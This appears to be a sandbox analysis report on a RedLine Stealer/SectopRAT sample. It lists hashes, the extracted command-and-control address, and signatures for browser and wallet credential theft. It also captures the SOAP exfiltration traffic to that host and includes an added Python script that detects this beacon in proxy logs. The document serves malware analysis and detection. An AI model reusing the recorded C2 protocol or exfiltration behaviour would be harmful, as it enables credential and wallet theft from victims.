Analysis
-
max time kernel
28s -
max time network
30s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system -
submitted
25/05/2023, 15:56 UTC
Behavioral task
behavioral1
Sample
2c5a75b7d24847bc5d206adb5c630a18.exe
Resource
win7-20230220-en
General
-
Target
2c5a75b7d24847bc5d206adb5c630a18.exe
-
Size
95KB
-
MD5
2c5a75b7d24847bc5d206adb5c630a18
-
SHA1
89ca4d98947ab1248c022d66a23279f04cca6bbf
-
SHA256
dd09828ffbfdd784f83cac83641b8a0c3ca04b76becabb0ab5d170ad1bc169a7
-
SHA512
2ff1ad476ea1c72f6e1cda33f601e2eae06ca87bf4554cd085e17512a88ad515e95d42706e8e0a2c2b1fe17c9e0f1c511ef1554333d17a7e6e111b1531acc789
-
SSDEEP
1536:Fqs8haqpalbG6jejoigIP43Ywzi0Zb78ivombfexv0ujXyyed2YtmulgS6pQl:DiaKaYP+zi0ZbYe1g0ujyzdsQ
Malware Config
Extracted
redline
crypto
163.123.142.235:61068
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource: behavioral1/memory/1520-54-0x0000000000C10000-0x0000000000C2E000-memory.dmp, yara_rule: family_redline
resource: behavioral1/memory/1520-55-0x00000000009B0000-0x00000000009F0000-memory.dmp, yara_rule: family_redline
-
SectopRAT payload 2 IoCs
resource: behavioral1/memory/1520-54-0x0000000000C10000-0x0000000000C2E000-memory.dmp, yara_rule: family_sectoprat
resource: behavioral1/memory/1520-55-0x00000000009B0000-0x00000000009F0000-memory.dmp, yara_rule: family_sectoprat
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials, cookies, and autofill data.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid: 1520, Process: 2c5a75b7d24847bc5d206adb5c630a18.exe
pid: 1520, Process: 2c5a75b7d24847bc5d206adb5c630a18.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description: Token: SeDebugPrivilege, pid: 1520, Process: 2c5a75b7d24847bc5d206adb5c630a18.exe
Processes
Network
-
Remote address: 163.123.142.235:61068
Request: POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 163.123.142.235:61068
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 25 May 2023 15:56:08 GMT
-
Remote address: 163.123.142.235:61068
Request: POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 163.123.142.235:61068
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate
Response: HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 25 May 2023 15:56:14 GMT
-
Remote address: 163.123.142.235:61068
Request: POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 163.123.142.235:61068
Content-Length: 1597997
Expect: 100-continue
Accept-Encoding: gzip, deflate
Response: HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 25 May 2023 15:56:27 GMT
-
Remote address: 163.123.142.235:61068
Request: POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 163.123.142.235:61068
Content-Length: 1597989
Expect: 100-continue
Accept-Encoding: gzip, deflate
Response: HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 25 May 2023 15:56:29 GMT
-
Remote address: 8.8.8.8:53
Request: api.ip.sb IN A
Response: api.ip.sb IN CNAME api.ip.sb.cdn.cloudflare.net; api.ip.sb.cdn.cloudflare.net IN A 104.26.12.31; api.ip.sb.cdn.cloudflare.net IN A 104.26.13.31; api.ip.sb.cdn.cloudflare.net IN A 172.67.75.172
-
Remote address: 104.26.12.31:443
Request: GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 354
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fcuvanY58K51nZUe9avuRJw2Dg6U4k5zpPGOsChL4a7%2FYWm7C7T1b8OUnFI9FIM3Y%2FTFwCKbHiampNWrkzJtI7QhVJGbHTAO%2BIW5yX9qYxJF1wn6HuMA8Iywkg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 7ccef7caab12286b-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
3.3MB sent, 40.8kB received, 2369 packets sent, 777 packets received
HTTP Request: POST http://163.123.142.235:61068/
HTTP Response: 200
HTTP Request: POST http://163.123.142.235:61068/
HTTP Response: 200
HTTP Request: POST http://163.123.142.235:61068/
HTTP Response: 200
HTTP Request: POST http://163.123.142.235:61068/
HTTP Response: 200
-
762 B sent, 6.2kB received, 9 packets sent, 10 packets received
HTTP Request: GET https://api.ip.sb/geoip
HTTP Response: 200
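The four SOAP POSTs above (CheckConnect, EnvironmentSettings, SetEnvironment, GetUpdates against a bare IP:port, two of them carrying about 1.6 MB bodies) are the RedLine/SectopRAT WCF beacon as it appears in a web proxy log. The detection logic below is an added example, not part of the sandbox report or of any vendor rule set: it scores per-host traffic on those traits and on the order of the endpoint methods. The tab-separated log line format, the score weights and thresholds, and the benign WCF host `erp.example.internal` are assumptions; the sample log lines are constructed from the requests recorded on this page.

```python
"""Score proxy-log records for the RedLine SOAP/WCF beacon pattern.

Added example, not code from the sandbox report. Assumed log format: one request per
line, tab-separated as "METHOD URL<TAB>Header: value<TAB>Header: value".
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

# Endpoint methods taken from the SOAPAction headers in the report, in the order the
# sample called them: check-in, fetch settings, upload collected data, poll for tasks.
REDLINE_METHODS = ("CheckConnect", "EnvironmentSettings", "SetEnvironment", "GetUpdates")
REDLINE_ACTIONS = {f"Endpoint/{m}" for m in REDLINE_METHODS}
SOAPACTION_RE = re.compile(r'^"?http://tempuri\.org/([^"\s]+)"?$')
BARE_IP_HOST_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
LARGE_BODY = 1_000_000  # bytes; SetEnvironment/GetUpdates above carried ~1.6 MB each

# Constructed log lines reproducing the page's traffic, plus one benign WCF service
# (hypothetical host) that also uses the default tempuri.org namespace.
SAMPLE_LOG = [
    'POST http://163.123.142.235:61068/\tHost: 163.123.142.235:61068\tContent-Type: text/xml; charset=utf-8\tSOAPAction: "http://tempuri.org/Endpoint/CheckConnect"\tContent-Length: 137',
    'POST http://163.123.142.235:61068/\tHost: 163.123.142.235:61068\tContent-Type: text/xml; charset=utf-8\tSOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"\tContent-Length: 144',
    'POST http://163.123.142.235:61068/\tHost: 163.123.142.235:61068\tContent-Type: text/xml; charset=utf-8\tSOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"\tContent-Length: 1597997',
    'POST http://163.123.142.235:61068/\tHost: 163.123.142.235:61068\tContent-Type: text/xml; charset=utf-8\tSOAPAction: "http://tempuri.org/Endpoint/GetUpdates"\tContent-Length: 1597989',
    'GET https://api.ip.sb/geoip\tHost: api.ip.sb',
    'POST https://erp.example.internal/Orders.svc\tHost: erp.example.internal\tContent-Type: text/xml; charset=utf-8\tSOAPAction: "http://tempuri.org/IOrders/GetOrders"\tContent-Length: 512',
]


@dataclass
class Record:
    method: str
    url: str
    headers: dict


def parse_line(line: str) -> Record:
    """Split one assumed-format log line into method, URL and lower-cased headers."""
    request, *raw_headers = line.split("\t")
    method, url = request.split(" ", 1)
    headers = {}
    for raw in raw_headers:
        name, _, value = raw.partition(":")  # first colon only: Host keeps its port
        headers[name.strip().lower()] = value.strip()
    return Record(method, url, headers)


def soap_action(rec: Record) -> Optional[str]:
    """Path under tempuri.org from the SOAPAction header, or None if absent."""
    m = SOAPACTION_RE.match(rec.headers.get("soapaction", ""))
    return m.group(1) if m else None


def score_record(rec: Record) -> tuple[int, list[str]]:
    """Per-request score: RedLine method name, plaintext POST to bare IP, large body."""
    score, reasons = 0, []
    action = soap_action(rec)
    host = rec.headers.get("host") or urlsplit(rec.url).netloc
    if action in REDLINE_ACTIONS:
        score += 3
        reasons.append(f"RedLine endpoint method {action.rsplit('/', 1)[-1]}")
    elif action is not None:
        # tempuri.org is the default WCF namespace; legitimate services use it too.
        reasons.append("default tempuri.org WCF namespace (weak on its own)")
    if rec.method == "POST" and rec.url.startswith("http://") and BARE_IP_HOST_RE.match(host):
        score += 2
        reasons.append(f"plaintext POST to bare IP:port {host}")
    body = int(rec.headers.get("content-length", "0") or 0)
    if action is not None and body >= LARGE_BODY:
        score += 2
        reasons.append(f"{body}-byte SOAP body (likely upload of collected data)")
    if urlsplit(rec.url).hostname == "api.ip.sb":
        score += 1
        reasons.append("public IP / geolocation lookup")
    return score, reasons


def detect(lines) -> dict[str, dict]:
    """Aggregate per destination host and add the beacon-sequence check."""
    hosts: dict[str, dict] = {}
    for line in lines:
        rec = parse_line(line)
        host = rec.headers.get("host") or urlsplit(rec.url).netloc
        entry = hosts.setdefault(host, {"score": 0, "reasons": [], "methods": []})
        s, r = score_record(rec)
        entry["score"] += s
        entry["reasons"].extend(r)
        action = soap_action(rec)
        if action in REDLINE_ACTIONS:
            entry["methods"].append(action.rsplit("/", 1)[-1])
    for entry in hosts.values():
        # The check-in -> settings -> upload order is stronger than any single request.
        it = iter(entry["methods"])
        if all(m in it for m in REDLINE_METHODS[:3]):
            entry["score"] += 3
            entry["reasons"].append("CheckConnect -> EnvironmentSettings -> SetEnvironment sequence")
        s = entry["score"]
        entry["verdict"] = "malicious" if s >= 8 else "suspicious" if s >= 1 else "clean"
    return hosts


if __name__ == "__main__":
    for host, entry in detect(SAMPLE_LOG).items():
        print(f"{host}: {entry['verdict']} (score {entry['score']})")
        for reason in entry["reasons"]:
            print(f"    {reason}")
```

The weights are deliberately asymmetric: the `tempuri.org` namespace alone contributes nothing because every unconfigured WCF service uses it, while a SOAP POST to a bare IP:port over plain HTTP with a megabyte-sized body is rare in legitimate traffic. The geolocation lookup only scores once; on its own it is weak and should be correlated with the originating process rather than blocked.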
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize
46KB
MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
92KB
MD5 747ae56c4c143d35c9f4deb890d470c3
SHA1 1bbe23d6c5eeb56f8a3ea5459bbd00cb825dc22a
SHA256 e847489244a60ca420a700898a700fc01002a84aed20b1af9d4ffde6b0a3214e
SHA512 f492b8d634c02d680e906f3827b53b41d69905ad59eda7c419f1f8af33a795f6330d1d88243eeab0365a1f25cf524070231ce4720034a4d0cf85a8acf5b05395